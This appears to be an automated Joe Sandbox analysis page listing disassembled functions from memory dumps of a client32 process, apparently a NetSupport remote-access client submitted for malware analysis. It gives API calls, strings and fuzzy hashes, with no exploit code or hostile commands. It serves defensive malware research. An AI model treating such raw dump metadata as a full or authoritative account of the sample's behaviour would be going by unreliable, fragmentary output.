Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LoadStringwsprintf
String ID: #%d$..\ctl32\util.cpp$i < cchBuf
API String ID: 104907563-3240211118
Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5

Function 11067180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ACF
Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ADD

GetParent.USER32(00000000), ref: 1106719C
GetParent.USER32(00000000), ref: 110671A5
IsChild.USER32(00000000,00000000), ref: 110671B9

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86

Strings

FixEHParent, xrefs: 110671C8
_debug, xrefs: 110671CD

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Parent$Child__wcstoi64
String ID: FixEHParent$_debug
API String ID: 320216221-498807111
Opcode ID: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
Instruction ID: 19ed4bc464ac013ef3aede55ea0528bdf8a938b54301afc5030378f5434f72ea
Opcode Fuzzy Hash: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
Instruction Fuzzy Hash: 33F09636E01925679F01A6AD4C84DAFFADE9DC555830140E7FE25EB100ED609E01C7A1

Function 68C7DBD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 68C7DBE9

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

wsprintfA.USER32 ref: 68C7DC04
_memset.LIBCMT ref: 68C7DC27

Strings

Refcount.cpp, xrefs: 68C7DC15
Can't alloc %u bytes, xrefs: 68C7DBFE

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc_memsetwsprintf
String ID: Can't alloc %u bytes$Refcount.cpp
API String ID: 2405090531-3988092936
Opcode ID: 0ffb1a32c4b330812cdc9f03f0c62e44e9c4aec3893b21d4b8805c673766dfd9
Instruction ID: 6fba069cd2130e303ef9ce6ed1d59aefdae0d84c8e95db53877f51526d0057ba
Opcode Fuzzy Hash: 0ffb1a32c4b330812cdc9f03f0c62e44e9c4aec3893b21d4b8805c673766dfd9
Instruction Fuzzy Hash: F7F0FCF6940118A7C7109A689C05EAF77BC9F86718F400059EF0567141F634AA0286D5

Function 68C69160 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?), ref: 68C69188
GetUserNameA.ADVAPI32(68C76AD7,?), ref: 68C691CD

Strings

@, xrefs: 68C691C3
client, xrefs: 68C6919F
*CurrentUserName, xrefs: 68C6919A

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: NameUserVersion
String ID: *CurrentUserName$@$client
API String ID: 427591506-3887416126
Opcode ID: a36383735c3e8c7afb80f134c82f8133ad08d8611761444a068c03c2fd44c7eb
Instruction ID: 5296fe8e2a94bbd5fc45358ba1907a53b510c7e80d645990fa9d8fe42d1fb277
Opcode Fuzzy Hash: a36383735c3e8c7afb80f134c82f8133ad08d8611761444a068c03c2fd44c7eb
Instruction Fuzzy Hash: EC01AD75D4011CEBDB50AF68D84AFADB7B8EB09318F8040D9E90E67241EA705A488B94

Function 68C7ABC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 68C7ABDA

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

Strings

NSMString.cpp, xrefs: 68C7AC16
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 68C7ABF9
IsEmpty(), xrefs: 68C7AC1B
IsA(), xrefs: 68C7ABFE

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 501242067-2615622132
Opcode ID: 440b6109c507c2459335042e59141a28611dd68dd699c8a5fee2ec076d4fb102
Instruction ID: 1f9118169452c8caaeccd29f1315a95301b17a90f21ec979f909770abea1b935
Opcode Fuzzy Hash: 440b6109c507c2459335042e59141a28611dd68dd699c8a5fee2ec076d4fb102
Instruction Fuzzy Hash: 00F0B4B1640715AFD320DF4DDC11B2A77D49F5970AF808429E55CA7281F371AC808792

Function 11017050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B

Strings

IPTip_Main_Window, xrefs: 11017053

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A

Function 68C84F31 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C84F8C
_memcpy_s.LIBCMT ref: 68C84FFD
__read.LIBCMT ref: 68C85060
__filbuf.LIBCMT ref: 68C8507C

Part of subcall function 68C860F9: __getptd_noexit.LIBCMT ref: 68C860F9

_memset.LIBCMT ref: 68C850BD

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
Instruction ID: 633de38cdf93a991f8463c1ca0024c50a62c6a29d0eea7370762d45e210a5a57
Opcode Fuzzy Hash: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
Instruction Fuzzy Hash: 8C51CBB4A80704DFDB108FA9984469EBFB5AF4132CF50862DE83597290F771DA52CB91

Function 11061070 Relevance: 7.6, APIs: 5, Instructions: 97timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 11061086

Part of subcall function 11160477: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,1101D218,00000000,62C07B5E,?,?,?,?,?,1117AD21,000000FF), ref: 11160482
Part of subcall function 11160477: __aulldiv.LIBCMT ref: 111604A2

SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061118
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061143
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061151

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__time64
String ID:
API String ID: 3203075409-0
Opcode ID: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
Instruction ID: 9fbe0da520f53b699568b749b3a3eae29a5fc02c94d56d28377b82a7ad20d906
Opcode Fuzzy Hash: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
Instruction Fuzzy Hash: A4315A75D1021DAACF04DFE4D841AEEF7B8EF88714F04856AE805B7280EA756A04CBA5

Function 68C7AC30 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 68C7AC64
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 68C7ACA1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 68C7ACB7
_malloc.LIBCMT ref: 68C7ACC6
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 68C7ACE0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__strdup_malloc
String ID:
API String ID: 2291067320-0
Opcode ID: 4a2a97cafdc4ffb482ed45ce6bca4734473e6a6ab81c9f1db9abd31db3cf5f11
Instruction ID: 7b597727db66573f65a4e42479da165ce93505e48ad80a3f9fb3eb6cc89fa0e7
Opcode Fuzzy Hash: 4a2a97cafdc4ffb482ed45ce6bca4734473e6a6ab81c9f1db9abd31db3cf5f11
Instruction Fuzzy Hash: 4931C271A04209FFE7208F25CC49FABBBB8EF46758F148155F955AB280E671E905CB90

Function 110250E0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
GetDlgItem.USER32(?,00001399), ref: 11025131
TranslateMessage.USER32(?), ref: 1102514A
DispatchMessageA.USER32(?), ref: 11025154
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95

Function 11023370 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
GetDlgItem.USER32(?,00001399), ref: 110233C1
TranslateMessage.USER32(?), ref: 110233DA
DispatchMessageA.USER32(?), ref: 110233E4
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91

Function 68C849F7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 68C84A05

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

_free.LIBCMT ref: 68C84A18

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 2b938d612d6fa851acef94217e106c70d8a0b59ae61f2a77f1df76b3bb778619
Instruction ID: 7ed47a486d06e0de0f2e38b67ec2cdb3687fec6fd3a17992f267de6025e9d92a
Opcode Fuzzy Hash: 2b938d612d6fa851acef94217e106c70d8a0b59ae61f2a77f1df76b3bb778619
Instruction Fuzzy Hash: 4211CFF64D4515EECB311E79A808ADD3E6CEB453ADB908029EA548F240FB31C841475C

Function 1103F120 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB

CreateRectRgnIndirect.GDI32(?), ref: 1103F168
CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
DeleteObject.GDI32(00000000), ref: 1103F183
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
